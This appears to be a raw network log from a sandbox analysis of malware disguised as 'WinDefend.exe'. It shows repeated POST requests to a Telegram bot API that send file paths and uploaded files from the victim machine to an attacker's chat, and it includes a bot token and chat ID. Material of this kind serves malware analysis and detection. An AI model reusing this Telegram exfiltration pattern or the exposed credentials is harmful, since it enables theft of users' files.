2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 65 72 6e 54 79 70 65 20 32 2f 53 68 61 64 69 6e 67 20 32 33 20 30 20 52 2f 54 79 70 65 2f 50 61 74 74 65 72 6e 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 35 20 30 20 6f 62 6a 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 2f 49 20 66 61 6c 73 65 2f 4b 20 66 61 6c 73 65 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 36 20 30 20 6f 62 6a 3c 3c 2f 4c 61 73 74 4d 6f 64 69 66 69 65 64 28 44 3a 32 30 30 33 30 31 30 38 31 34 33 36 33 35 2d 30 38 27 30 30 27 29 2f 50 72 69 76 61 74 65 20 32 37 20 30 20 52 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 37 20 30 20 6f 62 6a 3c 3c 2f 41 49 4d 65 74 61 44 61 74 61 20 32 38 20 30 20 52 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 2f 43 72 65 61 74 6f 72 56 65 72 73 69 Data Ascii: ernType 2/Shading 23 0 R/Type/Pattern>>endobj25 0 obj<</CS/DeviceRGB/I false/K false/S/Transparency/Type/Group>>endobj26 0 obj<</LastModified(D:20030108143635-08'00')/Private 27 0 R>>endobj27 0 obj<</AIMetaData 28 0 R/ContainerVersion 9/CreatorVersi
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 42 2f 49 20 66 61 6c 73 65 2f 4b 20 66 61 6c 73 65 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 0d 65 6e 64 6f 62 6a 0d 34 30 20 30 20 6f 62 6a 3c 3c 2f 4c 61 73 74 4d 6f 64 69 66 69 65 64 28 44 3a 32 30 30 33 30 31 30 38 31 34 33 36 35 36 2d 30 38 27 30 30 27 29 2f 50 72 69 76 61 74 65 20 34 31 20 30 20 52 3e 3e 0d 65 6e 64 6f 62 6a 0d 34 31 20 30 20 6f 62 6a 3c 3c 2f 41 49 4d 65 74 61 44 61 74 61 20 34 32 20 30 20 52 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 2f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 20 31 30 3e 3e 0d 65 6e 64 6f 62 6a 0d 34 32 20 30 20 6f 62 6a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 36 32 30 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 64 53 Data Ascii: B/I false/K false/S/Transparency/Type/Group>>endobj40 0 obj<</LastModified(D:20030108143656-08'00')/Private 41 0 R>>endobj41 0 obj<</AIMetaData 42 0 R/ContainerVersion 9/CreatorVersion 10>>endobj42 0 obj<</Filter/FlateDecode/Length 620>>streamHdS
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 74 61 20 35 36 20 30 20 52 2f 43 6f 6e 74 61 69 6e 65 72 56 65 72 73 69 6f 6e 20 39 2f 43 72 65 61 74 6f 72 56 65 72 73 69 6f 6e 20 31 30 3e 3e 0d 65 6e 64 6f 62 6a 0d 35 36 20 30 20 6f 62 6a 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 4c 65 6e 67 74 68 20 36 31 36 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 64 53 db 6e db 30 0c fd 82 fe 03 f7 10 20 c1 60 d7 96 1d df de 72 59 bb 60 4b 6b 24 69 81 61 18 02 2d e6 32 63 b2 15 c8 f2 ba ee eb 47 49 4e 53 ac 50 64 10 e4 39 a4 78 c8 8c de 95 5b 6f 56 c9 ef e8 45 7e 00 57 a3 d1 42 21 d7 52 15 60 bd b0 12 a2 ef b4 32 ae f1 66 02 61 e0 07 04 9a ad b2 fd 00 7c 44 d5 d5 b2 2d ce a1 1b c3 1d 7f 42 21 6a 84 6d af 7f a2 12 bc ad 26 30 76 09 b7 cf 9d c6 a6 9b 10 74 57 6b 81 04 7e 68 b5 b1 2a 8f e5 93 f3 0b Data Ascii: ta 56 0 R/ContainerVersion 9/CreatorVersion 10>>endobj56 0 obj<</Filter/FlateDecode/Length 616>>streamHdSn0 `rY`Kk$ia-2cGINSPd9x[oVE~WB!R`2fa\|D-B!jm&0vtWk~h*
2024-05-23 13:34:46 UTC	4096	OUT	Data Raw: 81 f5 c7 1e d0 84 02 12 ff 0d 6a 90 b1 7e a2 e6 6e 87 f5 99 d3 d8 cd dc 42 2f 76 69 ba d9 54 df 83 de 47 12 f3 7d 14 84 3e 4c d3 00 92 d8 b7 be 61 96 f8 bb c2 e7 1c 1e a4 40 3b b0 59 a3 b6 d5 5f 9a 4c ec 13 20 0b ac 75 d3 71 6c f6 a2 52 c4 8e 31 65 96 ed b5 2c 91 53 37 af d8 3b ce 4e 86 c1 a1 17 73 db 80 1d 6b 4e a8 68 fd 24 ef 94 f9 27 52 af 77 3d 74 f5 67 f6 82 7a a5 7c 5b e0 f1 8c 62 27 9f cc fb 9c 30 88 80 36 53 4f 20 88 63 c8 bc 04 02 3b a3 84 76 f4 6a 40 7d 3a 0d d6 d0 4b ce 84 a8 2f 68 bf 1e 9b ea 54 89 dc 70 62 d6 26 3c 14 ec 8c cd 06 8f 2a a7 df 4b 73 64 b8 72 5e fd 6b 7a b4 85 90 0d 9c 1e aa 37 f6 be a9 ca 61 61 93 00 52 7b 99 8e dd f4 ea 64 97 63 5b 23 96 94 42 61 97 fc 83 28 17 b2 d6 e3 68 6f fe 09 30 00 6a b5 30 92 0d 0a 65 6e 64 73 74 72 65 Data Ascii: j~nB/viTG}>La@;Y_L uqlR1e,S7;NskNh$'Rw=tgz\|[b'06SO c;vj@}:K/hTpb&<*Ksdr^kz7aaR{dc[#Ba(ho0j0endstre
2024-05-23 13:34:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	61123	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:46 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:47 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+96.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	61124	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:47 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e713547f-3bad-4959-9563-b0ac38454858" Host: api.telegram.org Content-Length: 889 Expect: 100-continue
2024-05-23 13:34:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:47 UTC	40	OUT	Data Raw: 2d 2d 65 37 31 33 35 34 37 66 2d 33 62 61 64 2d 34 39 35 39 2d 39 35 36 33 2d 62 30 61 63 33 38 34 35 34 38 35 38 0d 0a Data Ascii: --e713547f-3bad-4959-9563-b0ac38454858
2024-05-23 13:34:47 UTC	101	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 43 6c 6f 73 65 32 78 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 6c 6f 73 65 32 78 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Close2x.png; filename*=utf-8''Close2x.png
2024-05-23 13:34:47 UTC	563	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 ed 49 44 41 54 38 11 e5 93 cb 4b 1b 51 14 87 e7 d1 8d 16 4a ea 03 bb 70 55 8a 16 04 71 99 b8 72 e5 b6 08 7d d0 22 a5 2e 93 76 c8 4b 41 4a 91 80 82 34 84 90 a4 2e 2c dd 94 ae dc 94 6e ba 70 53 a8 52 34 d9 08 fe 19 85 2e 8a ca 6c cc cc f8 9d 30 17 ee 5c c7 bf c0 0b 93 f3 fa 9d ef 9e 99 7b 63 59 b7 6e d9 fa 1b 97 4a a5 a7 c4 6f a3 28 da 6b b7 db 9f f5 9a e9 7b 9e 77 cf 75 dd 5d f2 fd 4c 26 f3 a6 56 ab 85 a2 71 74 21 a0 25 e2 05 db b6 77 8b c5 e2 3b bd a6 fb 31 ec 80 dc 4b 7a 96 7d df bf ab ea 09 20 c9 8f 08 ce a4 08 f4 13 13 af 2a a1 b2 f9 7c fe 3e 93 09 6c 2e ce 6d d7 eb f5 73 55 77 95 23 b6 d7 eb fd cd e5 72 fb Data Ascii: PNGIHDRsRGBIDAT8KQJpUqr}".vKAJ4.,npSR4.l0\{cYnJo(k{wu]L&Vqt!%w;1Kz} *\|>l.msUw#r
2024-05-23 13:34:47 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 65 37 31 33 35 34 37 66 2d 33 62 61 64 2d 34 39 35 39 2d 39 35 36 33 2d 62 30 61 63 33 38 34 35 34 38 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --e713547f-3bad-4959-9563-b0ac38454858Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:47 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:47 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 65 37 31 33 35 34 37 66 2d 33 62 61 64 2d 34 39 35 39 2d 39 35 36 33 2d 62 30 61 63 33 38 34 35 34 38 35 38 2d 2d 0d 0a Data Ascii: --e713547f-3bad-4959-9563-b0ac38454858--
2024-05-23 13:34:47 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:47 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	61125	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:47 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9b01aca3-bab5-4d8f-b243-d333c19c0bfc" Host: api.telegram.org Content-Length: 6085 Expect: 100-continue
2024-05-23 13:34:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:48 UTC	40	OUT	Data Raw: 2d 2d 39 62 30 31 61 63 61 33 2d 62 61 62 35 2d 34 64 38 66 2d 62 32 34 33 2d 64 33 33 33 63 31 39 63 30 62 66 63 0d 0a Data Ascii: --9b01aca3-bab5-4d8f-b243-d333c19c0bfc
2024-05-23 13:34:48 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=96.png; filename*=utf-8''96.png
2024-05-23 13:34:48 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 60 08 06 00 00 00 e2 98 77 38 00 00 16 50 49 44 41 54 78 9c ed 5d 69 94 1c d5 75 fe ee 7d af aa a7 97 59 35 23 09 81 90 40 18 30 06 09 49 d8 60 83 6d b1 18 1b 6c 56 47 b2 f1 8e 1d a2 38 c9 09 5e d9 6c 87 16 71 d8 72 48 4e 20 39 8e 75 ec e3 25 c7 20 4b 18 e2 00 01 03 0e 02 1f 1f 6c 83 04 08 2c 8c 0d 18 8c 90 d0 86 b6 99 e9 a5 ea dd 9b 1f 55 d5 d3 33 cc 68 ba 67 ba 67 44 32 9f 4e 6b 34 ad ea 7a af de dd be ba f7 d6 6b 60 0a 53 98 c2 14 a6 30 85 29 4c 61 0a 93 8d a5 30 00 a8 69 e7 cf 83 e3 31 0e 18 34 ef 62 eb 41 1e 8c 3c a4 f2 fb 5f 2c f6 30 0b 5e 77 7f 6f d5 62 75 d7 79 d2 1d 03 ff ca e4 1c 36 23 c0 ca 75 01 00 28 40 c8 83 a8 7a cc 49 c2 e4 0b 40 41 20 28 ce 42 6a fa 49 27 2e 23 a2 0f 40 Data Ascii: PNGIHDR``w8PIDATx]iu}Y5#@0I`mlVG8^lqrHN 9u% Kl,U3hggD2Nk4zk`S0)La0i14bA<_,0^wobuy6#u(@zI@A (BjI'.#@
2024-05-23 13:34:48 UTC	1673	OUT	Data Raw: 0d 4a 5b c0 29 d6 e8 3d 52 a5 d8 32 c7 fe 8a 1b cb e1 44 35 db 92 a1 ce d6 76 15 d1 48 c4 14 d1 91 09 7c 81 88 21 30 c8 b8 7e bd ef 90 0f eb 73 1d f3 35 1d 14 54 c0 50 10 74 9c d7 0b 8d ff 80 25 45 4c 65 d1 17 fb fb b6 3d 12 ad c2 b0 02 00 80 3c ef 5a 39 6f 8f 2a dd 42 36 45 a0 a8 d9 9c c6 56 12 19 0c 4a 76 c0 02 f5 74 74 81 00 d2 58 ed 75 e2 d5 9f 20 42 0a 90 91 80 7a 6d 8e 6e 3b fc 73 a4 14 6b 4a 23 ac a0 d2 9e a7 ea 33 11 54 6f 9a fd e8 a6 82 0e 59 f3 a1 02 10 00 d8 5a 94 9b 35 e8 fd 3d 73 8b 51 a8 68 5c 2b 1c eb 5c 54 35 a2 3e 22 e8 c8 b5 a1 35 9d 81 a8 a0 fa d9 af 09 47 3c ae 90 41 36 ec c3 af a6 9f 8a 47 7b 96 20 1b f6 42 c8 8c ff 82 a3 66 71 97 36 6c f6 06 ee c9 e9 5b 0b df 89 d3 21 83 a8 f6 30 b4 2b cf f8 8f 05 7d 50 7c 1d cc d5 5d 96 e3 5a 25 81 Data Ascii: J[)=R2D5vH\|!0~s5TPt%ELe=<Z9o*B6EVJvttXu Bzmn;skJ#3ToYZ5=sQh\+\T5>"5G<A6G{ Bfq6l[!0+}P\|]Z%
2024-05-23 13:34:48 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 62 30 31 61 63 61 33 2d 62 61 62 35 2d 34 64 38 66 2d 62 32 34 33 2d 64 33 33 33 63 31 39 63 30 62 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9b01aca3-bab5-4d8f-b243-d333c19c0bfcContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:48 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:48 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 62 30 31 61 63 61 33 2d 62 61 62 35 2d 34 64 38 66 2d 62 32 34 33 2d 64 33 33 33 63 31 39 63 30 62 66 63 2d 2d 0d 0a Data Ascii: --9b01aca3-bab5-4d8f-b243-d333c19c0bfc--
2024-05-23 13:34:48 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:48 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	61126	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:47 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 171 Expect: 100-continue
2024-05-23 13:34:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:48 UTC	171	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 46 61 63 65 73 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 46 61 63 65 73 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 33 32 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+Faces.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CFaces.pdf%0ASize%3A+32+KB
2024-05-23 13:34:48 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:48 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	61127	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:48 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 180 Expect: 100-continue
2024-05-23 13:34:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:48 UTC	180	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6c 6f 73 65 5f 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 63 6c 6f 73 65 5f 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 30 36 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+close_x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cclose_x.png%0ASize%3A+306+B
2024-05-23 13:34:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	61128	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:49 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:34:49 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	61129	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:49 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="8bb134c7-bf6e-4aa8-a8b9-fc0060f8f956" Host: api.telegram.org Content-Length: 33335 Expect: 100-continue
2024-05-23 13:34:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:49 UTC	40	OUT	Data Raw: 2d 2d 38 62 62 31 33 34 63 37 2d 62 66 36 65 2d 34 61 61 38 2d 61 38 62 39 2d 66 63 30 30 36 30 66 38 66 39 35 36 0d 0a Data Ascii: --8bb134c7-bf6e-4aa8-a8b9-fc0060f8f956
2024-05-23 13:34:49 UTC	97	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 46 61 63 65 73 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 46 61 63 65 73 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Faces.pdf; filename*=utf-8''Faces.pdf
2024-05-23 13:34:49 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 54 79 70 65 20 2f 50 61 67 65 20 0d 2f 50 61 72 65 6e 74 20 33 37 20 30 20 52 20 0d 2f 52 65 73 6f 75 72 63 65 73 20 32 20 30 20 52 20 0d 2f 43 6f 6e 74 65 6e 74 73 20 33 20 30 20 52 20 0d 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 43 72 6f 70 42 6f 78 20 5b 20 30 20 30 20 36 31 32 20 37 39 32 20 5d 20 0d 2f 52 6f 74 61 74 65 20 30 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 32 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 50 72 6f 63 53 65 74 20 5b 20 2f 50 44 46 20 5d 20 0d 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 47 53 32 20 34 35 20 30 20 52 20 3e 3e 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 33 20 30 20 6f 62 6a 0d 3c 3c 20 2f 4c 65 6e 67 Data Ascii: %PDF-1.4%1 0 obj<< /Type /Page /Parent 37 0 R /Resources 2 0 R /Contents 3 0 R /MediaBox [ 0 0 612 792 ] /CropBox [ 0 0 612 792 ] /Rotate 0 >> endobj2 0 obj<< /ProcSet [ /PDF ] /ExtGState << /GS2 45 0 R >> >> endobj3 0 obj<< /Leng
